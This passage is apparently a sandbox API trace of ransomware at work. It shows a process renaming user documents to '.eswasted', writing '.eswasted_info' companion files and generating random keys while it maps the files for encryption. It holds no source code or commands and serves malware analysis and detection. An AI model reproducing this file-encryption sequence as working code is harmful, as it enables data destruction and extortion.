nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.852] SetEndOfFile (hFile=0xfc) returned 1 [0072.852] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.852] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.852] lstrcpyW (in: lpString1=0x4ec078, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Aw8JE.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\aw8je.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Aw8JE.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\aw8je.odt.eswasted")) returned 1 [0072.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Aw8JE.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\aw8je.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.853] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0072.855] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.855] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.855] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.855] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.856] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.856] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.880] SetEndOfFile (hFile=0xfc) returned 1 [0072.882] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.882] CloseHandle (hObject=0xfc) returned 1 [0072.883] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.884] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.884] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.884] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\BkGu.csv") returned 67 [0072.884] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4ebff0 [0072.884] lstrcpyW (in: lpString1=0x4ec076, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.884] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.884] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.885] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.885] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\BkGu.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\bkgu.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.886] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.886] SetEndOfFile (hFile=0xfc) returned 1 [0072.887] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.887] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.887] lstrcpyW (in: lpString1=0x4ec076, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\BkGu.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\bkgu.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\BkGu.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\bkgu.csv.eswasted")) returned 1 [0072.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\BkGu.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\bkgu.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.887] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.888] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.889] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.889] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.889] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.889] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.889] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.898] SetEndOfFile (hFile=0xfc) returned 1 [0072.899] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.900] CloseHandle (hObject=0xfc) returned 1 [0072.901] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.901] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.902] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.902] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\EHwJlWqwUeSG.odt") returned 75 [0072.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a0) returned 0x4ebff0 [0072.902] lstrcpyW (in: lpString1=0x4ec086, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.902] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.902] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.903] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\EHwJlWqwUeSG.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\ehwjlwqwuesg.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.906] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.907] SetEndOfFile (hFile=0xfc) returned 1 [0072.907] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.907] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.907] lstrcpyW (in: lpString1=0x4ec086, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\EHwJlWqwUeSG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\ehwjlwqwuesg.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\EHwJlWqwUeSG.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\ehwjlwqwuesg.odt.eswasted")) returned 1 [0072.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\EHwJlWqwUeSG.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\ehwjlwqwuesg.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.908] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.910] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.911] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.911] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.911] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.912] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.912] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.920] SetEndOfFile (hFile=0xfc) returned 1 [0072.922] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.922] CloseHandle (hObject=0xfc) returned 1 [0072.923] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.923] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.924] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.924] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FkEMP76BREhXOB.ots") returned 77 [0072.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a4) returned 0x4e1ab8 [0072.924] lstrcpyW (in: lpString1=0x4e1b52, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.924] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.925] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.925] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FkEMP76BREhXOB.ots.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fkemp76brehxob.ots.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.926] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.927] SetEndOfFile (hFile=0xfc) returned 1 [0072.927] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.927] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.927] lstrcpyW (in: lpString1=0x4e1b52, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FkEMP76BREhXOB.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fkemp76brehxob.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FkEMP76BREhXOB.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fkemp76brehxob.ots.eswasted")) returned 1 [0072.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FkEMP76BREhXOB.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fkemp76brehxob.ots.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.928] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.930] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.931] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.931] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.931] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.931] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.931] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.939] SetEndOfFile (hFile=0xfc) returned 1 [0072.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.942] CloseHandle (hObject=0xfc) returned 1 [0072.943] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.943] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.944] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.944] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FNDs7yaSuCA-.pps") returned 75 [0072.944] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a0) returned 0x4ebff0 [0072.944] lstrcpyW (in: lpString1=0x4ec086, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.944] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.944] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.945] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.945] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FNDs7yaSuCA-.pps.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fnds7yasuca-.pps.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.946] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.947] SetEndOfFile (hFile=0xfc) returned 1 [0072.947] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.947] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.947] lstrcpyW (in: lpString1=0x4ec086, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FNDs7yaSuCA-.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fnds7yasuca-.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FNDs7yaSuCA-.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fnds7yasuca-.pps.eswasted")) returned 1 [0072.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\FNDs7yaSuCA-.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\fnds7yasuca-.pps.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.948] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.949] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.949] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.949] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.949] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.950] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.950] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.958] SetEndOfFile (hFile=0xfc) returned 1 [0072.960] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.960] CloseHandle (hObject=0xfc) returned 1 [0072.962] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.962] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.963] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.963] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\G bHp5sGj.docx") returned 73 [0072.963] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29c) returned 0x4ebff0 [0072.963] lstrcpyW (in: lpString1=0x4ec082, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.963] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.963] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.964] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.964] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\G bHp5sGj.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\g bhp5sgj.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.964] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.965] SetEndOfFile (hFile=0xfc) returned 1 [0072.965] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.965] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.965] lstrcpyW (in: lpString1=0x4ec082, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.965] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\G bHp5sGj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\g bhp5sgj.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\G bHp5sGj.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\g bhp5sgj.docx.eswasted")) returned 1 [0072.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\G bHp5sGj.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\g bhp5sgj.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.966] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.969] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.969] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.969] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.969] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.970] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.970] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.983] SetEndOfFile (hFile=0xfc) returned 1 [0073.033] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0073.033] 